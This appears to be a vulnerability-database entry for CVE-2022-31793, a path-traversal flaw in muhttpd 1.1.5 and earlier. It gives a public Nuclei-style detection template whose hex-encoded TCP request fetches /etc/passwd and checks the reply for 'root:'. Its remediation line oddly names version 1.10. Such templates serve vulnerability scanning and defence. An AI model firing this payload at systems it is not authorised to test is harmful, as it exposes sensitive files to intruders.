CVE-2022-31793: muhttpd <=1.1.5 - Local Inclusion

日期: 2025-08-01 | 影响软件: muhttpd | POC: 已公开

漏洞描述

muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.

PoC代码[已公开]

id: CVE-2022-31793

info:
  name: muhttpd <=1.1.5 - Local Inclusion
  author: scent2d
  severity: high
  description: |
    muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the system.
  remediation: Update the application to version 1.10
  reference:
    - https://derekabdine.com/blog/2022-arris-advisory.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
    - https://derekabdine.com/blog/2022-arris-advisory
    - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/
    - http://inglorion.net/software/muhttpd/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31793
    cwe-id: CWE-22
    epss-score: 0.93819
    epss-percentile: 0.9986
    cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: inglorion
    product: muhttpd
  tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp
tcp:
  - host:
      - "{{Hostname}}"
    inputs:
      - data: "47455420612F6574632F706173737764"
        type: hex

      - data: "\n\n"
    read-size: 128
    matchers:
      - type: word
        part: body
        encoding: hex
        words:
          - "726f6f743a"
# digest: 4a0a00473045022100d20c1854faf0c965ab67c1c29680cc472719f970bc0b65bbd2a4613ceb7890da022034704ac7547af3d2e7bb8aa3462b83e3cadb31e2e628a905a69de867c72594f1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐